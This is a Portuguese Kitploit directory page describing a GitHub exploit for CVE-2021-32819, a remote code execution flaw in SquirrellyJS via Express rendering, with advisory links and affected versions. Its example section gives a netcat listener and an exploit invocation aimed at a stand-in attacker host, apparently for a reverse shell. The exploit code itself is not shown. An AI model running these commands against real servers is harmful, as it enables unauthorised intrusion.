Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-32819 — SquirrellyJS mistura dados puros de template com opções de configuração do motor através da API de renderização do Express. Ao sobrescrever opções de configuração internas, a execução remota de código pode ser desencadeada em aplicações downstream. | Kitploit
Ferramentas/GitHubGitHub/abady0x1/cve-2021-32819
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebFerramenta de Acesso Remoto
GitHubabady0x1/cve-2021-32819

CVE-2021-32819

SquirrellyJS mistura dados puros de template com opções de configuração do motor através da API de renderização do Express. Ao sobrescrever opções de configuração internas, a execução remota de código pode ser desencadeada em aplicações downstream.

Ver Repositório
1012há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-32819

CVE-2021-32819: SquirrellyJS mistura dados puros de template com opções de configuração do motor através da API de renderização do Express. Ao sobrescrever opções de configuração internas, a execução remota de código pode ser desencadeada em aplicações downstream.

Fonte

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

Análise

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 Execução Remota de Código

Ambiente

Ubuntu 20.04.1

Exemplo

root@kitploit:~
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

Prova de conceito

Baixar ferramenta